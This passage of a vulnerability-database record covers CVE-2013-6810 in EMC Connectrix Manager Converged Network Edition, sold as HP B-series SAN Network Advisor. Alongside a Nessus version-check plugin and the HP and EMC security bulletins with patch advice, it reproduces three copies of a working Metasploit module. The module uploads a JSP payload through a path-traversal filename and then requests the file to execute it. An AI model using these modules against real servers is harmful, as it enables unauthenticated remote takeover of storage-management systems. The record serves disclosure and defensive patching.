a third-party product from Brocade.", "modified": "2018-11-15T00:00:00", "id": "HP_B-SERIES_SAN_NETWORK_ADVISOR_LINUX_12_1_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72178", "published": "2014-01-28T00:00:00", "title": "HP B-series SAN Network Advisor < 12.1.1 Remote Code Execution (Linux)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72178);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2013-6810\");\n script_bugtraq_id(64242);\n\n script_name(english:\"HP B-series SAN Network Advisor < 12.1.1 Remote Code Execution (Linux)\");\n script_summary(english:\"Checks version of HP B-series SAN Network Advisor\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application that is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP B-series SAN Network Advisor on the remote Linux host\nis a version prior to 12.1.1. As such, it is affected by a remote code\nexecution vulnerability. \n\nIt should be noted that while the associated references report on a\nremote code execution vulnerability in EMC Connectrix Manager\nConverged Network Edition, HP B-series SAN Network Advisor is the same\nproduct under an HP name and is, therefore, also affected. Moreover,\nthe issue is actually due to a third-party product from Brocade.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-278/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-279/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-280/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-281/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-282/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-283/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://attrition.org/pipermail/vim/2014-January/002755.html\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04045640\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f70e4bba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530357/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to HP B-series SAN Network Advisor 12.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:b_series_san_network_advisor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_b-series_san_network_advisor_linux_installed.nbin\");\n script_require_keys(\"Host/HP B-Series SAN Network Advisor/Installed\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"HP B-series SAN Network Advisor\";\n\nkb_base = \"Host/HP B-Series SAN Network Advisor/\";\nver = get_kb_item_or_exit(kb_base + \"Version\");\npath = get_kb_item_or_exit(kb_base + \"Path\");\n\nif (ver !~ \"^[0-9.]+$\") exit(1, \"The version of \"+appname+\" (\"+ver+\") is not entirely numeric numeric.\");\n\nfix = \"12.1.1\";\nmin = \"12.0.0\";\n\nif (ver_compare(ver:ver, fix:min, strict:FALSE) >= 0 && ver_compare(ver:ver, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, ver, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-09-15T10:22:49", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-14T00:00:00", "published": "2017-09-14T00:00:00", "href": "https://packetstormsecurity.com/files/144150/EMC-CMCNE-11.2.1-Inmservlets.war-FileUploadController-Remote-Code-Execution.html", "id": "PACKETSTORM:144150", "title": "EMC CMCNE 11.2.1 Inmservlets.war FileUploadController Remote Code Execution", "type": "packetstorm", "sourceData": "`require 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution', \n'Description' => %q{ \nThis module exploits a file upload vulnerability found in EMC \nConnectrix Manager Converged Network Edition <= 11.2.1. The file \nupload vulnerability is triggered when sending a specially crafted \nfilename to the FileUploadController servlet found within the \nInmservlets.war archive. This allows the attacker to upload a \nspecially crafted file which leads to remote code execution in the \ncontext of the server user. \n}, \n'Author' => [ 'james fitts' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'ZDI', '13-280' ], \n[ 'CVE', '2013-6810' ] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 18 2013')) \n \nregister_options([ \nOpt::RPORT(80) \n], self.class) \nend \n \ndef exploit \n \npeer = \"#{datastore['RHOST']}:#{datastore['RPORT']}\" \ndeploy = \"..\\\\..\\\\..\\\\deploy\\\\dcm-client.war\\\\\" \njsp = payload.encoded.gsub(/\\x0d\\x0a/, \"\").gsub(/\\x0a/, \"\") \n@jsp_name = \"#{rand_text_alphanumeric(4 + rand(32-4))}.jsp\" \n \ndata = Rex::MIME::Message.new \ndata.add_part(\"#{jsp}\", nil, nil, \"form-data; name=\\\"ftproot\\\"; filename=\\\"#{deploy}#{@jsp_name}\\\"\") \n \npost_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, \"--_Part_\") \n \nprint_status(\"#{peer} - Uploading the JSP Payload...\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(\"inmservlets\", \"FileUploadController\"), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'headers' => { \n'ROOTDIR' => \"ftproot\" \n} \n}) \n \nif res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/ \nprint_good(\"File uploaded successfully!\") \nprint_status(\"Executing '#{@jsp_name}' now...\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(\"dcm-client\", \"#{@jsp_name}\") \n}) \nelse \nprint_error(\"Does not look like the files were uploaded to #{peer}...\") \nend \n \nend \n \nend \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144150/emccmcneinms-exec.rb.txt"}], "zdt": [{"lastseen": "2018-01-09T19:29:38", "bulletinFamily": "exploit", "description": "Exploit for java platform in category remote exploits", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "href": "https://0day.today/exploit/description/28542", "id": "1337DAY-ID-28542", "type": "zdt", "title": "EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution Exploit", "sourceData": "require 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability found in EMC\r\n Connectrix Manager Converged Network Edition <= 11.2.1. The file\r\n upload vulnerability is triggered when sending a specially crafted\r\n filename to the FileUploadController servlet found within the \r\n Inmservlets.war archive. This allows the attacker to upload a\r\n specially crafted file which leads to remote code execution in the\r\n context of the server user.\r\n },\r\n 'Author' => [ 'james fitts' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'ZDI', '13-280' ],\r\n [ 'CVE', '2013-6810' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Dec 18 2013'))\r\n \r\n register_options([\r\n Opt::RPORT(80)\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n peer = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n deploy = \"..\\\\..\\\\..\\\\deploy\\\\dcm-client.war\\\\\"\r\n jsp = payload.encoded.gsub(/\\x0d\\x0a/, \"\").gsub(/\\x0a/, \"\")\r\n @jsp_name = \"#{rand_text_alphanumeric(4 + rand(32-4))}.jsp\"\r\n \r\n data = Rex::MIME::Message.new\r\n data.add_part(\"#{jsp}\", nil, nil, \"form-data; name=\\\"ftproot\\\"; filename=\\\"#{deploy}#{@jsp_name}\\\"\")\r\n \r\n post_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, \"--_Part_\")\r\n \r\n print_status(\"#{peer} - Uploading the JSP Payload...\")\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(\"inmservlets\", \"FileUploadController\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'headers' => {\r\n 'ROOTDIR' => \"ftproot\"\r\n }\r\n })\r\n \r\n if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/\r\n print_good(\"File uploaded successfully!\")\r\n print_status(\"Executing '#{@jsp_name}' now...\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(\"dcm-client\", \"#{@jsp_name}\")\r\n })\r\n else\r\n print_error(\"Does not look like the files were uploaded to #{peer}...\")\r\n end\r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/28542", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T22:13:41", "bulletinFamily": "exploit", "description": "Exploit for java platform in category remote exploits", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "href": "https://0day.today/exploit/description/28541", "id": "1337DAY-ID-28541", "type": "zdt", "title": "EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution Exploit", "sourceData": "require 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'EMC CMCNE FileUploadController Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a fileupload vulnerability found in EMC\r\n Connectrix Manager Converged Network Edition <= 11.2.1. The file\r\n upload vulnerability is triggered when sending a specially crafted\r\n filename to the FileUploadController servlet. This allows the\r\n attacker to upload a malicious jsp file to anywhere on the remote\r\n file system.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'james fitts' ],\r\n 'References' =>\r\n [\r\n [ 'ZDI', '13-279' ],\r\n [ 'CVE', '2013-6810' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Dec 18 2013'))\r\n \r\n register_options([\r\n Opt::RPORT(80)\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n peer = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n deploy = \"..\\\\..\\\\..\\\\deploy\\\\dcm-client.war\\\\\"\r\n jsp = payload.encoded.gsub(/\\x0d\\x0a/, \"\").gsub(/\\x0a/, \"\")\r\n @jsp_name = \"#{rand_text_alphanumeric(4 + rand(32-4))}.jsp\"\r\n \r\n data = Rex::MIME::Message.new\r\n data.add_part(\"#{jsp}\", \"application/octet-stream\", nil, \"form-data; name=\\\"source\\\"; filename=\\\"#{deploy}#{@jsp_name}\\\"\")\r\n data.add_part(\"#{rand_text_alpha_upper(5)}\", nil, nil, \"form-data; name=\\\"driverFolderName\\\"\")\r\n \r\n post_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, \"--_Part_\")\r\n \r\n print_status(\"#{peer} - Uploading the JSP Payload...\")\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(\"HttpFileUpload\", \"FileUploadController.do\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n })\r\n \r\n if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/\r\n print_good(\"File uploaded successfully!\")\r\n print_status(\"Executing '#{@jsp_name}' now...\")\r\n \r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(\"dcm-client\", \"#{@jsp_name}\")\r\n })\r\n \r\n else\r\n print_error(\"Does not look like the files were uploaded to #{peer}...\")\r\n end\r\n \r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-03-12] #", "sourceHref": "https://0day.today/exploit/28541", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "No description provided", "modified": "2014-01-08T00:00:00", "published": "2014-01-08T00:00:00", "id": "SECURITYVULNS:VULN:13490", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13490", "title": "HP SAN Network Advisor code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04045640\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04045640\r\nVersion: 1\r\n\r\nHPSBHF02953 rev.1 - HP B-series SAN Network Advisor, Remote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-12-16\r\nLast Updated: 2013-12-16\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP B-series SAN\r\nNetwork Advisor. The vulnerability could be exploited remotely resulting in\r\ncode execution.\r\n\r\nReferences: CVE-2013-6810 (BROCADE TSB 2013-176-A, SSRT101392)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP B-series SAN Network Advisor Enterprise Software v12.0.x\r\n\r\nHP B-series SAN Network Advisor Professional Plus Software v12.0.x\r\n\r\nHP B-series SAN Network Advisor Professional Plus Upgrade Software v12.0.x\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-6810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following updates available to resolve the vulnerability.\r\n\r\nHP B-series SAN Network Advisor Enterprise Software v12.1.1\r\n\r\nHP B-series SAN Network Advisor Professional Plus Software v12.1.1\r\n\r\nHP B-series SAN Network Advisor Professional Plus Upgrade Software v12.1.1\r\n\r\n1) Go to http://www.hp.com/support/downloads.\r\n\r\n2) Click on "Storage", "Storage Networking", and then "StoreFabric B-series\r\nSwitches".\r\n\r\n3) Click on the link for the appropriate switch, and then select your\r\nproduct.\r\n\r\n4) Select under "Drivers, Software & Firmware" and then select your switch.\r\n\r\n5) Click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)".\r\n\r\n6) Click on "Application".\r\n\r\n7) In the "Description" column of the table, click on "HP SAN B-series SAN\r\nNetwork Advisor" to download the current version.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 December 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlKvPL4ACgkQ4B86/C0qfVmu1gCfQJ/IVzeCRa5EKtAfF5bzsNpY\r\nCJQAn0XuI2HuuPZ7+j7F/gzlL8U2NEew\r\n=K3ek\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2014-01-08T00:00:00", "published": "2014-01-08T00:00:00", "id": "SECURITYVULNS:DOC:30170", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30170", "title": "[security bulletin] HPSBHF02953 rev.1 - HP B-series SAN Network Advisor, Remote Code Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "description": "\r\n\r\n\r\n\r\nESA-2013-089.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2013-089: EMC Connectrix Manager Converged Network Edition Remote Code Execution Vulnerabilities \r\n\r\n\r\nEMC Identifier: ESA-2013-089\r\n\r\n\r\nCVE Identifier: CVE-2013-6810\r\n\r\n\r\nSeverity Rating: CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nAffected products: \r\n\r\n\u2022\tEMC Connectrix Manager Converged Network Edition (CMCNE) 11.2.1, 12.0.1 and 12.0.3\r\n\r\n\r\nSummary: \r\n\r\nEMC Connectrix Manager Converged Network Edition (CMCNE) Server may be vulnerable to remote code execution attacks. \r\n\r\n\r\nDetails: \r\n\r\nEMC Connectrix Manager Converged Network Edition (CMCNE) contains vulnerabilities through the servlets which it uses to transfer different types of files for managing firmware on different types of devices. Using these servlets, remote unauthenticated attackers could read and place files from/on the CMCNE server and execute them. \r\n\r\nReference: Brocade Technical Support Bulletin TSB 2013-176-A (available at my.brocade.com).\r\n\r\n\r\nResolution: \r\n\r\nThe following products contain the resolution to these issues:\r\n\u2022\tEMC Connectrix Manager Converged Network Edition (CMCNE) 12.1.2 or higher \r\n\r\n\r\nEMC strongly recommends all customers upgrade at the earliest opportunity. As a security best practice, customers are strongly advised to isolate the CMCNE server from external networks using VLANs and/or firewall rules only allowing authorized administrators to interact with the CMCNE server.\r\n\r\nLink to remedies:\r\n\r\nEMC Connectrix Manager Converged Network Edition (CMCNE) 12.1.2 downloads and documentation can be found at EMC Online Support:\r\nhttps://support.emc.com/products/23304_Connectrix-Manager-Converged-Network-Edition\r\nhttps://support.emc.com/downloads/120_Connectrix\r\n\r\n\r\nCredits: \r\n\r\nEMC would like to thank Andrea Micalizzi (aka rgod) working with Zero Day Initiative (http://www.zerodayinitiative.com) for reporting these issues.\r\n\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlKotxgACgkQtjd2rKp+ALxWxACgtblAgf0oDLvWhBTFo3/3yqRP\r\nwf0AoMXl/23SLWICh9zFAhIFCwith7YZ\r\n=ABCO\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2014-01-08T00:00:00", "published": "2014-01-08T00:00:00", "id": "SECURITYVULNS:DOC:30176", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30176", "title": "ESA-2013-089: EMC Connectrix Manager Converged Network Edition Remote Code Execution Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}